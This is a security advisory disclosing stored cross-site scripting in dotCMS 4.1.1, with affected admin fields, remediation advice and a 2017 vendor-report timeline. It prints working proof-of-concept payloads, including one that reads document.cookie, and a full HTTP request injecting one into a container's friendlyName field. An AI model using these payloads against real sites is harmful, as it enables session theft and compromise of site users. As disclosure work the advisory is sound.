[+] CVE ID: Pending 
[+] Credits: Brett DeWall aka @xbadbiddyx 
[+] Websites: https://github.com/badbiddy 
[+] Source: https://raw.githubusercontent.com/badbiddy/Vulnerability-Disclosure/master/dotCMS%20%3E%204.1.1%20-%20Stored%20XSS

Vendor:
==========================
dotCMS
https://www.dotcms.com/


Product:
===========
dotCMS
Version: 4.1.1

Vulnerability Type:
==========================
Stored Cross-Site Scripting (XSS)


Vulnerability Details:
=====================
Application is vulnerable to stored XSS within multiple sections of the application. The application does not 
sanitize user supplied input and renders injected javascript code to the users browsers. 
Attackers use this vulnerability to inject malicious javascript code such as a malicious redirect, 
crypto currency mining, or exploit kit.


Replication:
=====================
1) Navigate to the following example pages:
  - https://demo.dotcms.com/dotAdmin/#/c/vanity-urls -- Title parameter
  - https://demo.dotcms.com/dotAdmin/#/c/containers -- Description parameter
  - https://demo.dotcms.com/dotAdmin/#/c/templates -- Description parameter

2) Each of these areas of the application allow for unsanitized input to be supplied by a user.
The following payload was utilized in the testing: <svg/onload=alert('XSS')> or "%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E"

3) Perform the normal function within the application to create a new "Vanity URL, Container, or Template" 
inserting the payload into the specific parameter location will trigger the vulnerability.


Example HTTP Request with XSS payload:
=====================

HTTP Request:

POST /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=containers&p_p_action=1&p_p_state=maximized&p_p_mode=view&_containers_struts_action=%2Fext%2Fcontainers%2Fedit_container HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0

_containers_cmd=add&_containers_referer=%252Fc%252Fportal%252Flayout%253Fp_l_id%253Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%2526p_p_id%253Dcontainers%2526p_p_action%253D1%2526p_p_state%253Dmaximized%2526_containers_pageNumber%253D1%2526_containers_struts_action%253D%25252Fext%25252Fcontainers%25252Fview_containers&_containers_redirect=https%3A%2F%2Fdemo.dotcms.com%2Fc%2Fportal%2Flayout%3Fp_l_id%3Db7ab5d3c-5ee0-4195-a17e-8f5579d718dd%26p_p_id%3Dcontainers%26p_p_action%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_containers_struts_action%3D%252Fext%252Fcontainers%252Fview_containers&_containers_subcmd=&_containers_inode=69956b08-e4d6-4f97-8101-55446da1e1cb&userId=dotcms.org.1&hostId=48190c8c-42c4-46af-8d1a-0cd5db894797&title=TEST&friendlyName=TEST%3Csvg%2Fonload%3Dalert%28document.cookie%29%3E&maxContentlets=0&preLoopMask=&preLoop=&toggleEditorPreLoop=on&structureInode=4c441ada-944a-43af-a653-9bb4f3f0cb2b&toggleEditorCodeMultiple=on&codeMask=TEST&code=TEST&toggleEditorCode=on&postLoopMask=&postLoop=&toggleEditorPostLoop=on&notes=&permissionsUserSelector=






Remediation Details:
=====================
Prevent the application from rendering javascript supplied from the end user. 
Create a whitelist of allowed characters for each input field.
Sanitize user supplied input server side.


Timeline:
=====================
2017-10-06 - Issue Reported to Vendor


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

badbiddy